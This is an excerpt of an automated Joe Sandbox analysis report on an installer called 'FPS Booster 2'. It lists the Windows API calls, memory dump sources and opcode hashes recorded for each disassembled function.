                                                • Source File: 00000007.00000002.2602445757.000000006E9E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6E9E0000, based on PE: true
                                                • Associated: 00000007.00000002.2602410980.000000006E9E0000.00000002.00000001.01000000.0000000B.sdmp
                                                • Associated: 00000007.00000002.2602469964.000000006E9E3000.00000002.00000001.01000000.0000000B.sdmp
                                                • Associated: 00000007.00000002.2602504176.000000006E9E5000.00000002.00000001.01000000.0000000B.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6e9e0000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: ProtectVirtual
                                                • String ID:
                                                • API String ID: 544645111-0
                                                • Opcode ID: 1948995302cad62d405a4693e9fb8bca954830d691b8d6c1f862f771b31c334f
                                                • Instruction ID: c21fcbdea15def82bb79ce4db6a05078bc0c60e089be4ed425c44e81dcca8724
                                                • Opcode Fuzzy Hash: 1948995302cad62d405a4693e9fb8bca954830d691b8d6c1f862f771b31c334f
                                                • Instruction Fuzzy Hash: D0E0AEF1919B40DECB91CFB89444B213AE0AF5F317B01453AA348D6382E2308A069F19
                                                APIs
                                                  • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                  • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                  • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                  • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                • CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: Char$Next$CreateDirectoryPrev
                                                • String ID:
                                                • API String ID: 4115351271-0
                                                • Opcode ID: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                • Instruction ID: c72586207ca4fe3275e323c6ce7a55902ce0015f7edb1a19efdc0f2786dab76c
                                                • Opcode Fuzzy Hash: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                • Instruction Fuzzy Hash: 52D0921218293121C66237663D0ABCF195C4F92B2EB0280B7F942B61D69B6C4A9285EE
                                                APIs
                                                  • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00426D70,76F923A0,00000000), ref: 00406902
                                                • SetDlgItemTextW.USER32(?,?,00000000), ref: 00403D85
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: ItemTextVersion
                                                • String ID:
                                                • API String ID: 1287519508-0
                                                • Opcode ID: ecc267a58f007a645cce87880ef4dcbc169c5a84c400769f7d645cc81fbf47b3
                                                • Instruction ID: 3d91de8bf8cbd2b1f3a3cf9e9dcc3d672f8c1b7d0241b958bd96d56531da4427
                                                • Opcode Fuzzy Hash: ecc267a58f007a645cce87880ef4dcbc169c5a84c400769f7d645cc81fbf47b3
                                                • Instruction Fuzzy Hash: 7EC04C76148300BFE641A759CC46F1FB799EFA4719F00C52EB19CE11D5CA398420DA26
                                                APIs
                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: FilePointer
                                                • String ID:
                                                • API String ID: 973152223-0
                                                • Opcode ID: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                • Instruction ID: a45aac6c24818fd8413ddab5752014fb5f73d741524c96ff6ff4c62981ea4fba
                                                • Opcode Fuzzy Hash: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                • Instruction Fuzzy Hash: 83B01231640200FFEA214F50DE09F06BB21B794700F208430B350380F082711820EB0C
                                                APIs
                                                • SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                • Instruction ID: 19f7ed481b0b3084dfc48602985d3e47af739273f13ec77122cd0735a5794091
                                                • Opcode Fuzzy Hash: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                • Instruction Fuzzy Hash: CCB01235181200BBDE514B00DE0AF867F62F7A8701F008574B305640F0C6B204E0DB09
                                                APIs
                                                • GlobalAlloc.KERNELBASE(00000040,?,6E9E15BA,?,?,6E9E185F,?,6E9E1017), ref: 6E9E158B
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2602445757.000000006E9E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6E9E0000, based on PE: true
                                                • Associated: 00000007.00000002.2602410980.000000006E9E0000.00000002.00000001.01000000.0000000B.sdmp
                                                • Associated: 00000007.00000002.2602469964.000000006E9E3000.00000002.00000001.01000000.0000000B.sdmp
                                                • Associated: 00000007.00000002.2602504176.000000006E9E5000.00000002.00000001.01000000.0000000B.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6e9e0000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: AllocGlobal
                                                • String ID:
                                                • API String ID: 3761449716-0
                                                • Opcode ID: 7e2b3d4700722790af89b3a8938b365cbfcfcf0c0bbcd54c2ff01de6e91b439b
                                                • Instruction ID: 29757e3f2a97f70e03f7b4572dd48eea126e25d332dc10dfecaa678977f58efb
                                                • Opcode Fuzzy Hash: 7e2b3d4700722790af89b3a8938b365cbfcfcf0c0bbcd54c2ff01de6e91b439b
                                                • Instruction Fuzzy Hash: 6CB012F1604400AFEF00C724CC0EF343BA4EF01306F000090B704D1041C1204C008D14
                                                APIs
                                                • GetDlgItem.USER32(?,00000403), ref: 0040515B
                                                • GetDlgItem.USER32(?,000003EE), ref: 0040516A
                                                • GetClientRect.USER32(?,?), ref: 004051C2
                                                • GetSystemMetrics.USER32(00000015), ref: 004051CA
                                                • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
                                                • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
                                                • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
                                                • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
                                                • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
                                                • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
                                                • ShowWindow.USER32(?,00000008), ref: 00405266
                                                • GetDlgItem.USER32(?,000003EC), ref: 00405287
                                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
                                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
                                                • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
                                                • GetDlgItem.USER32(?,000003F8), ref: 00405179
                                                  • Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                  • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00426D70,76F923A0,00000000), ref: 00406902
                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(File: skipped: "C:\Users\user\AppData\Local\Temp\nss20C1.tmp\nsDialogs.dll" (overwriteflag=1),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                • GetDlgItem.USER32(?,000003EC), ref: 004052D7
                                                • CreateThread.KERNEL32(00000000,00000000,Function_00005073,00000000), ref: 004052E5
                                                • CloseHandle.KERNEL32(00000000), ref: 004052EC
                                                • ShowWindow.USER32(00000000), ref: 00405313
                                                • ShowWindow.USER32(?,00000008), ref: 00405318
                                                • ShowWindow.USER32(00000008), ref: 0040535F
                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
                                                • CreatePopupMenu.USER32 ref: 004053A2
                                                • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
                                                • GetWindowRect.USER32(?,?), ref: 004053CA
                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
                                                • OpenClipboard.USER32(00000000), ref: 00405437
                                                • EmptyClipboard.USER32 ref: 0040543D
                                                • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
                                                • GlobalLock.KERNEL32(00000000), ref: 00405453
                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
                                                • GlobalUnlock.KERNEL32(00000000), ref: 00405489
                                                • SetClipboardData.USER32(0000000D,00000000), ref: 00405494
                                                • CloseClipboard.USER32 ref: 0040549A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                • String ID: New install of "%s" to "%s"${
                                                • API String ID: 2110491804-1641061399
                                                • Opcode ID: 38b4acc354727a4c0417075670f91dc05251f42a4507735c69c00d05c80ce0cf
                                                • Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
                                                • Opcode Fuzzy Hash: 38b4acc354727a4c0417075670f91dc05251f42a4507735c69c00d05c80ce0cf
                                                • Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58
                                                APIs
                                                • GetDlgItem.USER32(?,000003F9), ref: 004049BF
                                                • GetDlgItem.USER32(?,00000408), ref: 004049CC
                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
                                                • LoadBitmapW.USER32(0000006E), ref: 00404A2E
                                                • SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
                                                • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
                                                • SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
                                                • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
                                                • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
                                                • DeleteObject.GDI32(?), ref: 00404AA5
                                                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
                                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
                                                • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
                                                • GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
                                                • ShowWindow.USER32(?,00000005), ref: 00404BFB
                                                • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
                                                • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
                                                • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
                                                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
                                                • ImageList_Destroy.COMCTL32(?), ref: 00404DC8
                                                • GlobalFree.KERNEL32(?), ref: 00404DD8
                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
                                                • SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
                                                • ShowWindow.USER32(?,00000000), ref: 00404F75
                                                • GetDlgItem.USER32(?,000003FE), ref: 00404F80
                                                • ShowWindow.USER32(00000000), ref: 00404F87
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                • String ID: $ @$M$N
                                                • API String ID: 1638840714-3479655940
                                                • Opcode ID: cc3be99d98a9ea92f75939d7095cd46bb936d2bea9b18232ff9af80ebaba2d6d
                                                • Instruction ID: ef4bce446953bc7ec7e60756d12a1063aab4f745b4df8f164389f1335a379dc2
                                                • Opcode Fuzzy Hash: cc3be99d98a9ea92f75939d7095cd46bb936d2bea9b18232ff9af80ebaba2d6d
                                                • Instruction Fuzzy Hash: 7B028DB090020AAFEF109F95CD45AAE7BB5FB84314F10417AF611BA2E1C7B89D91CF58
                                                APIs
                                                • GetDlgItem.USER32(?,000003F0), ref: 00404525
                                                • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
                                                • GetDlgItem.USER32(?,000003FB), ref: 00404553
                                                • GetAsyncKeyState.USER32(00000010), ref: 0040455A
                                                • GetDlgItem.USER32(?,000003F0), ref: 0040456F
                                                • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
                                                • SetWindowTextW.USER32(?,?), ref: 004045AF
                                                • SHBrowseForFolderW.SHELL32(?), ref: 00404669
                                                • lstrcmpiW.KERNEL32(Show,00451D98,00000000,?,?), ref: 004046A6
                                                • lstrcatW.KERNEL32(?,Show), ref: 004046B2
                                                • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
                                                • CoTaskMemFree.OLE32(00000000), ref: 00404674
                                                  • Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3
                                                  • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                  • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                  • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                  • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                  • Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB
                                                • GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0
                                                  • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00426D70,76F923A0,00000000), ref: 00406902
                                                • SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                • String ID: A$Show
                                                • API String ID: 3347642858-4076820621
                                                • Opcode ID: 450c1996ff3fe57422673dbeff918444172cade2dc46c3f90f2ec1556e888b3b
                                                • Instruction ID: 610cab7253faed09e83e35c18a41c8795a2522a57bd741f73bb79fe4ae4f2c97
                                                • Opcode Fuzzy Hash: 450c1996ff3fe57422673dbeff918444172cade2dc46c3f90f2ec1556e888b3b
                                                • Instruction Fuzzy Hash: A3B181B1900209BBDB11AFA1CC85AAF7BB8EF45315F10843BFA05B72D1D77C9A418B59
                                                APIs
                                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
                                                • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
                                                • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
                                                • lstrcmpA.KERNEL32(name,?), ref: 00406FF3
                                                • CloseHandle.KERNEL32(?), ref: 00407212
                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(File: skipped: "C:\Users\user\AppData\Local\Temp\nss20C1.tmp\nsDialogs.dll" (overwriteflag=1),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                • API String ID: 1916479912-1189179171
                                                • Opcode ID: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                • Instruction ID: 0b41acfa2c3272d6dc61f6848418d9961a63ce1f0aee58dce5ac99f5834af97b
                                                • Opcode Fuzzy Hash: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                • Instruction Fuzzy Hash: 8491CB70D1412DAADF05EBE5C9908FEBBBAEF58301F00406AF592F7290E2385A05DB75
                                                APIs
                                                • CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E
                                                Strings
                                                • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: CreateInstance
                                                • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                • API String ID: 542301482-1377821865
                                                • Opcode ID: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                • Instruction ID: 17e7a05f0d3b91d3be5025a92c0a08315d4604efbe7233a371b14ee5b096337f
                                                • Opcode Fuzzy Hash: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                • Instruction Fuzzy Hash: 9E416E74A00205BFCB04EFA0CC99EAE7B79EF48314B20456AF915EB3D1C679A941CB54
                                                APIs
                                                • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
                                                • lstrlenW.KERNEL32(?), ref: 004063F8
                                                • GetVersionExW.KERNEL32(?), ref: 00406456
                                                  • Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D
                                                • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
                                                • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
                                                • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
                                                • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
                                                • FreeLibrary.KERNEL32(00000000), ref: 00406500
                                                • GlobalFree.KERNEL32(?), ref: 00406509
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
